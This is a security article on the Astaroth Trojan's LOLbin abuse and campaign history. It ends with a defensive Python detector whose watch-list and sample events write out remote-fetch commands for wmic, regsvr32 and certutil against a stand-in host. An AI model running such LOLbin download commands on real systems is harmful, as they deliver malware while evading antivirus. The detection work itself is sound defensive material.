Astaroth Trojan is notorious in the world of cybersecurity for using living off the land binaries (LOLbins) to remain undetected. In the latest Astaroth campaign, the Trojan is distributed through the Cloudflare Workers serverless computing platform to evade antivirus software.
How is the attack launched?
Astaroth’s operators use Cloudflare Workers as part of their three-step infection process.
Evolution of Astaroth Trojan
The Astaroth Trojan is believed to have been active since late 2017. In 2018 its campaigns narrowed to target South American users exclusively.
In Astaroth’s February 2019 campaign, the attackers focused on stealing credentials from Brazilian users. Rather than dropping a standalone executable, they abused a legitimate Avast component to load a malicious module that collected information about the target systems, consistent with the Trojan’s reliance on trusted binaries to stay under the radar.
Microsoft discovered another Astaroth campaign in May and June 2019. Andrea Lelli, from Microsoft Defender ATP Research, says, “Abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”
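The point Microsoft makes above is that LOLbin abuse leaves a behavioural trail even when no malicious file touches disk. The following is an added example, not code from the original article or from any vendor, of how a defender can act on that: a small heuristic run over constructed process-creation events that flags well-known LOLbins (wmic.exe, regsvr32.exe, bitsadmin.exe, certutil.exe, mshta.exe) when they are launched with arguments that fetch or execute remote content. The watch-list, argument patterns and sample telemetry are assumptions chosen for illustration; they are not a description of Astaroth’s actual infection chain.

```python
# Added example (not from the original article): a minimal heuristic that flags
# Windows process-creation events in which a known living-off-the-land binary
# (LOLbin) is launched with a remote URL or a payload-loading switch.
# The LOLbin list, argument patterns and sample events are constructed for
# illustration; they do not describe Astaroth's real infection chain.
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed watch-list (assumption: these argument patterns are rare in normal
# administrative use on the monitored hosts, so a match is worth an analyst's time).
LOLBIN_RULES = {
    "wmic.exe":      [r"/format:\s*[\"']?https?://"],             # XSL script from a URL
    "regsvr32.exe":  [r"/i:\s*[\"']?https?://", r"scrobj\.dll"],  # remote scriptlet
    "bitsadmin.exe": [r"/transfer\b", r"https?://"],              # download job
    "certutil.exe":  [r"-urlcache\b", r"-decode\b"],              # download / decode
    "mshta.exe":     [r"https?://", r"javascript:|vbscript:"],    # inline or remote script
}

@dataclass
class ProcessEvent:
    host: str
    parent: str
    image: str          # full path of the created process
    command_line: str

@dataclass
class Alert:
    host: str
    image: str
    reason: str

def _basename(path: str) -> str:
    """Normalise a Windows path to its lower-case file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def evaluate(event: ProcessEvent) -> Optional[Alert]:
    """Return an Alert when the event matches a LOLbin abuse pattern, else None."""
    name = _basename(event.image)
    patterns = LOLBIN_RULES.get(name)
    if not patterns:
        return None
    for pat in patterns:
        if re.search(pat, event.command_line, re.IGNORECASE):
            return Alert(event.host, name, f"{name} launched with argument matching /{pat}/")
    return None

def scan(events: List[ProcessEvent]) -> List[Alert]:
    """Evaluate every event and keep only the ones that raised an alert."""
    return [a for a in (evaluate(e) for e in events) if a is not None]

# Constructed sample telemetry in the shape of Sysmon process-creation events.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "explorer.exe", r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic os get /format:"https://example.invalid/u.xsl"'),
    ProcessEvent("ws01", "cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic os get caption"),                      # benign inventory query
    ProcessEvent("ws02", "cmd.exe", r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll"),
    ProcessEvent("ws02", "services.exe", r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs"),                   # not a watched binary
    ProcessEvent("ws03", "cmd.exe", r"C:\Windows\System32\certutil.exe",
                 "certutil -urlcache -split -f http://example.invalid/p.bin p.bin"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.host}] {alert.reason}")
```

The benign `wmic os get caption` and the `svchost.exe` launch pass through untouched; only the three events that pull remote content are raised. In production the same logic belongs in the EDR or SIEM query language rather than a script, and the parent process (here kept on each event but not yet used) is the next field to condition on: a LOLbin spawned from a user-facing application such as explorer.exe or a browser is far more suspicious than one spawned from a management agent.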